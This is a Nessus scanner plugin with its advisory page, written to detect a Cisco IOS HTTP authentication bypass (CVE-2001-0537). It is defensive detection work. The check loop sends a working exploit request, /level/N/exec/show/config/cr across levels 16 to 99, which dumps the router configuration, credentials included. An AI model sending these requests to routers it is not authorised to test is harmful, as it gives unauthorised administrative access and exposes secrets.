Source: nessus | This script is Copyright (C) 2001-2018 Tenable Network Security, Inc. | CISCO_HTTP_ADMIN_ACCESS.NASL
History: Jul 02, 2001 - 12:00 a.m.

Cisco IOS HTTP Configuration Unauthorized Administrative Access

2001-07-02 00:00:00
This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.
www.tenable.com
65

9.3 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.877 High

EPSS

Percentile

98.7%

It is possible to execute arbitrary commands on the remote Cisco router. An attacker may leverage this issue to disable network access via this device or lock legitimate users out of the router.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Registration block: when the scanner loads the plugin in description mode it
# only records the metadata below and exits, so no traffic is sent from here.
if (description)
{
  # Identifiers: plugin ID and revision, plus the CVE and Bugtraq references
  # that tie this check to the vendor advisory.
  script_id(10700);
  script_version("1.38");
  script_cve_id("CVE-2001-0537");
  script_bugtraq_id(2936);

  script_name(english:"Cisco IOS HTTP Configuration Unauthorized Administrative Access");

  # Text shown to the person reading the scan report.
  script_set_attribute(attribute:"synopsis", value:
"The remote router allows authentication to be bypassed and arbitrary 
commands to be executed.");
  script_set_attribute(attribute:"description", value:
"It is possible to execute arbitrary commands on the remote Cisco
router.  An attacker may leverage this issue to disable network access
via this device or lock legitimate users out of the router.");
  # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20010627-ios-http-level
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?dba2bf4f");
  # The only remediation reported is switching the HTTP configuration
  # interface off (on IOS typically `no ip http server`); check the advisory
  # above for fixed releases if the interface has to stay enabled.
  script_set_attribute(attribute:"solution", value:
"Disable the web configuration interface completely.");

  # Risk scoring: network-reachable, no authentication, full C/I/A impact.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  # CWE-287: Improper Authentication.
  script_cwe_id(287);

  # Timeline and classification.
  script_set_attribute(attribute:"plugin_publication_date", value:"2001/07/02");
  script_cvs_date("Date: 2018/11/15 20:50:20");
  script_set_attribute(attribute:"vuln_publication_date", value:"2001/06/27");
  script_set_attribute(attribute:"patch_publication_date", value:"2001/06/27");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:cisco:ios");
  # "exploited_by_nessus" = true: a finding comes from the check actually
  # retrieving the configuration, not from a banner or version comparison.
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  # Scheduling information: category, family, prerequisite plugin and the
  # ports/services that must be present for the check to run.
  script_summary(english:"Obtains the remote router configuration");
  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2001-2018 Tenable Network Security, Inc.");
  script_family(english:"CISCO");
  script_dependencie("http_version.nasl");
  script_require_ports("Services/www", 80);
  exit(0);
}

#

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# Check body: confirm the target looks like a Cisco IOS HTTP server, then ask
# for the configuration at each privilege level from 16 to 99 and report the
# first response that looks like a router configuration.
port = get_http_port(default:80);
no404_marker = get_kb_item("www/no404/" + port);

# Only continue against servers whose banner identifies Cisco IOS or shows the
# "level NN access" authentication realm.
banner = get_http_banner(port:port);
if (!banner) exit(0);

looks_like_ios = ("cisco-IOS" >< banner) || egrep(pattern:"level [0-9]+ access", string:banner);
if (!looks_like_ios) exit(0);

# A "www/no404/<port>" KB entry is present: stop here.
# NOTE(review): presumably this marks servers that do not return a proper 404,
# where a content match would be unreliable - confirm against the plugin
# that sets the key.
if (!isnull(no404_marker)) exit(0);

if (!get_port_state(port)) exit(0);

for (level = 16; level < 100; level++)
{
  probe_path = string("/level/", level, "/exec/show/config/cr");
  reply = http_send_recv3(method:"GET", item:probe_path, port:port);
  # No HTTP response at all: give up instead of trying the remaining levels.
  if (isnull(reply)) exit(0);

  # All three keywords must appear in the response body before it is treated
  # as a configuration dump; this keeps error pages from being reported.
  body = reply[2];
  if ("enable" >!< body || "interface" >!< body || "ip address" >!< body) continue;

  # The finding embeds the complete response body. A router configuration
  # commonly carries password hashes and other secrets, so scan results from
  # this plugin should be stored and shared as sensitive data.
  report = string(
    "\n",
    "Nessus was able to execute a command on the remote Cisco router and\n",
    "retrieve its configuration file using the following URL :\n",
    "\n",
    "  ", build_url(port:port, qs:probe_path), "\n",
    "\n",
    "Here are its contents :\n",
    "\n",
    body
  );
  security_hole(port:port, extra:report);
  exit(0);
}
Vendor | Product | Version | CPE
cisco | ios | | cpe:/o:cisco:ios

9.3 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

0.877 High

EPSS

Percentile

98.7%